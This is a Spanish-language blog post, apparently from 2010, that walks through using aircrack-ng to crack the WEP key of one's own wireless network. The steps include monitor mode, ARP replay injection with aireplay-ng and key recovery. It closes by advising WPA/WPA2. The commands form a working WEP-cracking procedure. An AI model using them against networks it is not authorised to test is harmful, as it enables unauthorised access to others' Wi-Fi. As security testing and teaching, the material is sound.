Como comprobar la seguridad de nuestra red wireless y la robustez de nuestra clave con la sencilla aplicación AirCrack-ng, paso a paso.
Es muy sencillo conseguirla ya que se encuentra en los repositorios de Linux, así que instalando Ubuntu 10.04, conexión a internet y una tarjeta Wireless ya podemos ir tirando.
Primero nos logueamos como root:
david@laptop:~$ su -l
Password:
root@laptop:~#
----> y entramos en nuestra carpeta de documentos, luego veremos por qué.
root@laptop:~# cd /home/(miusuario)/Documents/direcotorioqueyoquiera
Si no tenemos habilitado el root podemos hacerlo de la siguiente manera:
david@laptop:~$ sudo passwd root
[sudo] password for david:
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
---->también deberemos entrar en la carpeta documentos.
root@laptop:~# cd /home/(miusuario)/Documents/directorioqueyoquiera
O poniendo “sudo” delante de TODOS los comandos que relato a continuación.
---->En este caso tendremos que hacer en command console (terminal)...
$cd directorioqueyoquiera
Despues descargamos el programa entrando en consola la siguiente línea.
#apt-get install aircrack-ng
Y ya está instalado, facil.
Este paquete incluye:
airodump-ng
airmon-ng
aircrack-ng
aireplay-ng
… entre otros... Pero para lo que muestro a continuación solo necesitaremos las que ya he citado. Comenzamos el mogollón.
Primero:
Averiguamos nuestra propia MAC con el comando ifconfig, así a secas.
root@laptop:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr (aqui te pone la MAC)
inet addr:192.168.1.35 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fxxxxxxxxxxxxxxxxxxxxxxxxx Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5171 errors:0 dropped:0 overruns:0 frame:0
TX packets:5543 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5279816 (5.2 MB) TX bytes:1056334 (1.0 MB)
Segundo:
Arrancamos la interfaz.
root@laptop:~# airmon-ng start wlan0
Es posible que dé algunos errores pero aún así contunaremos adelante.
Tercero:
Escaneamos en busca de nuestra red, con este comando nos mostrará todas las redes a su alcance, algunas incluso ocultas.
root@laptop:~# airodump-ng mon0
CH “número de canal” ][ Elapsed: 0 s ][ 2010-06-29 23:29
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
(MacPuntoAcceso) -88 240 0 9 54 . (tipoenc)(tipocifrado) (RED)
Ya tenemos algunos datos que vemos que se publican, la MAC, el tipo de cifrado y el nombre de la red. Además veremos dispositivos inalámbricos en el alcance de nuestra wifi y sus números de MAC.
Si queremos ver porque no hay que poner claves encriptación WEP, solo tenemos que seguir los siguientes pasos.
root@laptop:~#sudo airodump-ng -c (número de canal) -w (RED) mon0 7
Los datos que nos muestra a continuación son los mismos que anteriormente, pero hemos limitado el escaneo al canal (número de canal) y a la red (RED). Además estamos estableciendo un enlace a través del interfaz lógico mon0. Este enlace nos hará falta en los siguientes comandos.
Abrimos otra terminal sin cerrar la anterior y:
root@laptop:~#sudo aireplay-ng -3 -e (RED) -b (MacPuntoAcceso) -h (NuestraMac) mon0
Con este sencillo comando estamos capturando los paquetes ARP que se guardarán con la extensión “.cap”, en la carpeta /home/usuario/Documents/directorioqueyoquiera.
Por esto al principio dije que había que acceder a esta carpeta, porque este comando genera un “chorreo” de archivos cap, que para eliminarlos, digamos que sería incomodo y mejor que no estén mezclados con nuestros archivos personales. Pero continuemos.
Abrimos otra command console e introducimos:
#aireplay-ng -1 6000 -q 10 -o 1 -e (RED) -a (MacPuntoAcceso) -h (NuestraMac) mon0
Con esto realizamos el enlace solicitamos paquetes ARP al punto de acceso.
Y a esperar a que juntemos por lo menos 200000 ARP's para estar seguros.
Cuando terminemos detenemos los procesos con ctrl+c o cerrando directamente la consola y abrimos el directorio que hayamos definido antes.
#aircrack-ng *.cap
...
KEY FOUND! [ (un chorro de números alfanum que no interesan) ] (ASCII: (nuestra clave encriptada) )
Y ya está, así que siempre que creemos una red inalámbrica, mejor la configuramos con un tipo de encriptación WPA o WPA2. Lo cual, si lo que queremos hacer es crear una red ad-hoc inalámbrica es bastante dificil, pero eso ya lo veremos en el siguiente post.
No hay comentarios:
Publicar un comentario